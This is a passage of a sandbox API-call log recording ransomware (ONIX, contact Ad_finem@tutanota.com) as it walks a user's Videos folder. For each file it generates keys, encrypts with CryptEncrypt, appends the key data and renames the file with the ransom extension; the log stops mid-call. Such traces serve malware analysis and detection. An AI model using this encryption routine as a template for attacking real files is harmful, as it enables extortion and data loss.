[0121.827] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaa8a) returned 0xf50048 [0121.828] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.828] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0xaa8a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0xaa8a, lpOverlapped=0x0) returned 1 [0121.830] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xaa8a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.830] CloseHandle (hObject=0x4c8) returned 1 [0121.831] GetProcessHeap () returned 0x410000 [0121.831] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.831] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mvNITyeIYPrbnztH.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mvnityeiyprbnzth.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mvNITyeIYPrbnztH.swf.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mvnityeiyprbnzth.swf.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.833] GetProcessHeap () returned 0x410000 [0121.833] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0121.833] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcad1da70, ftCreationTime.dwHighDateTime=0x1d5e6b4, ftLastAccessTime.dwLowDateTime=0x10fa0c80, ftLastAccessTime.dwHighDateTime=0x1d5d89f, ftLastWriteTime.dwLowDateTime=0x10fa0c80, ftLastWriteTime.dwHighDateTime=0x1d5d89f, nFileSizeHigh=0x0, nFileSizeLow=0x170f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P6W8dpio.mkv", cAlternateFileName="")) returned 1 [0121.833] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P6W8dpio.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p6w8dpio.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.833] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.833] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x170f9, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.833] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.833] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.834] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.834] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.834] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.834] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.834] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P6W8dpio.mkv", dwFileAttributes=0x80) returned 1 [0121.834] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P6W8dpio.mkv") returned 50 [0121.834] GetProcessHeap () returned 0x410000 [0121.834] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd4) returned 0x44faf8 [0121.834] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P6W8dpio.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P6W8dpio.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P6W8dpio.mkv" [0121.834] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P6W8dpio.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P6W8dpio.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P6W8dpio.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.834] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=94457) returned 1 [0121.834] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x170f9 [0121.834] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.834] GetProcessHeap () returned 0x410000 [0121.835] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.835] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.836] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.838] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.840] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.841] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x170f9) returned 0xf50048 [0121.842] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x170f9) returned 0xf67150 [0121.842] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.842] ReadFile (in: hFile=0x4c8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x170f9, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x170f9, lpOverlapped=0x0) returned 1 [0121.846] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x170f9, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.846] CloseHandle (hObject=0x4c8) returned 1 [0121.847] GetProcessHeap () returned 0x410000 [0121.847] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.847] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P6W8dpio.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p6w8dpio.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P6W8dpio.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p6w8dpio.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.852] GetProcessHeap () returned 0x410000 [0121.852] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.852] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cfc4b40, ftCreationTime.dwHighDateTime=0x1d5e7dd, ftLastAccessTime.dwLowDateTime=0x8963c230, ftLastAccessTime.dwHighDateTime=0x1d5e56d, ftLastWriteTime.dwLowDateTime=0x8963c230, ftLastWriteTime.dwHighDateTime=0x1d5e56d, nFileSizeHigh=0x0, nFileSizeLow=0x16fdf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pI-i1SbaEfC3pxo61o.mkv", cAlternateFileName="PI-I1S~1.MKV")) returned 1 [0121.852] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pI-i1SbaEfC3pxo61o.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pi-i1sbaefc3pxo61o.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.852] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.852] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x16fdf, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.852] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.852] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.853] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.853] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.853] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.853] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.853] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pI-i1SbaEfC3pxo61o.mkv", dwFileAttributes=0x80) returned 1 [0121.853] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pI-i1SbaEfC3pxo61o.mkv") returned 60 [0121.853] GetProcessHeap () returned 0x410000 [0121.853] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe8) returned 0x467908 [0121.853] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pI-i1SbaEfC3pxo61o.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pI-i1SbaEfC3pxo61o.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pI-i1SbaEfC3pxo61o.mkv" [0121.853] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pI-i1SbaEfC3pxo61o.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pI-i1SbaEfC3pxo61o.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pI-i1SbaEfC3pxo61o.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.853] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=94175) returned 1 [0121.853] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x16fdf [0121.854] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.854] GetProcessHeap () returned 0x410000 [0121.854] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.854] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.855] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.857] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.858] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.859] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16fdf) returned 0xf50048 [0121.860] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16fdf) returned 0xf67030 [0121.860] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.861] ReadFile (in: hFile=0x4c8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x16fdf, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x16fdf, lpOverlapped=0x0) returned 1 [0121.864] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x16fdf, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.864] CloseHandle (hObject=0x4c8) returned 1 [0121.868] GetProcessHeap () returned 0x410000 [0121.868] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.868] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pI-i1SbaEfC3pxo61o.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pi-i1sbaefc3pxo61o.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pI-i1SbaEfC3pxo61o.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pi-i1sbaefc3pxo61o.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.870] GetProcessHeap () returned 0x410000 [0121.870] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0121.870] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8cb9e60, ftCreationTime.dwHighDateTime=0x1d5e7d2, ftLastAccessTime.dwLowDateTime=0xdca24430, ftLastAccessTime.dwHighDateTime=0x1d5dc94, ftLastWriteTime.dwLowDateTime=0xdca24430, ftLastWriteTime.dwHighDateTime=0x1d5dc94, nFileSizeHigh=0x0, nFileSizeLow=0x4d21, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="szDnQMXBDkRkzrRDmEB.mkv", cAlternateFileName="SZDNQM~1.MKV")) returned 1 [0121.870] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\szDnQMXBDkRkzrRDmEB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\szdnqmxbdkrkzrrdmeb.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.870] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.870] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4d21, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.870] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.871] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.871] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.871] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.872] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.872] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.872] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\szDnQMXBDkRkzrRDmEB.mkv", dwFileAttributes=0x80) returned 1 [0121.872] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\szDnQMXBDkRkzrRDmEB.mkv") returned 61 [0121.872] GetProcessHeap () returned 0x410000 [0121.872] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xea) returned 0x44faf8 [0121.872] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\szDnQMXBDkRkzrRDmEB.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\szDnQMXBDkRkzrRDmEB.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\szDnQMXBDkRkzrRDmEB.mkv" [0121.872] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\szDnQMXBDkRkzrRDmEB.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\szDnQMXBDkRkzrRDmEB.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\szDnQMXBDkRkzrRDmEB.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.872] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=19745) returned 1 [0121.872] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x4d21 [0121.872] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.872] GetProcessHeap () returned 0x410000 [0121.872] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.872] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.874] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.875] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.877] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.878] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4d21) returned 0x4dcb68 [0121.878] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4d21) returned 0x4e1898 [0121.878] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.878] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x4d21, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x4d21, lpOverlapped=0x0) returned 1 [0121.881] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4d21, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.881] CloseHandle (hObject=0x4c8) returned 1 [0121.881] GetProcessHeap () returned 0x410000 [0121.882] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.882] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\szDnQMXBDkRkzrRDmEB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\szdnqmxbdkrkzrrdmeb.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\szDnQMXBDkRkzrRDmEB.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\szdnqmxbdkrkzrrdmeb.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.885] GetProcessHeap () returned 0x410000 [0121.885] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.885] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6bdce90, ftCreationTime.dwHighDateTime=0x1d5e06e, ftLastAccessTime.dwLowDateTime=0xdf7795c0, ftLastAccessTime.dwHighDateTime=0x1d5e1ee, ftLastWriteTime.dwLowDateTime=0xdf7795c0, ftLastWriteTime.dwHighDateTime=0x1d5e1ee, nFileSizeHigh=0x0, nFileSizeLow=0x159c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tl0VgadX3YpFbBS.mkv", cAlternateFileName="TL0VGA~1.MKV")) returned 1 [0121.885] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tl0VgadX3YpFbBS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tl0vgadx3ypfbbs.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.885] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.885] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x159c, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.885] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.885] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.886] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.886] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.887] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.887] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.887] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tl0VgadX3YpFbBS.mkv", dwFileAttributes=0x80) returned 1 [0121.887] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tl0VgadX3YpFbBS.mkv") returned 57 [0121.887] GetProcessHeap () returned 0x410000 [0121.887] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe2) returned 0x467908 [0121.887] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tl0VgadX3YpFbBS.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tl0VgadX3YpFbBS.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tl0VgadX3YpFbBS.mkv" [0121.887] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tl0VgadX3YpFbBS.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tl0VgadX3YpFbBS.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\tl0VgadX3YpFbBS.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.887] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=5532) returned 1 [0121.887] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x159c [0121.887] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, 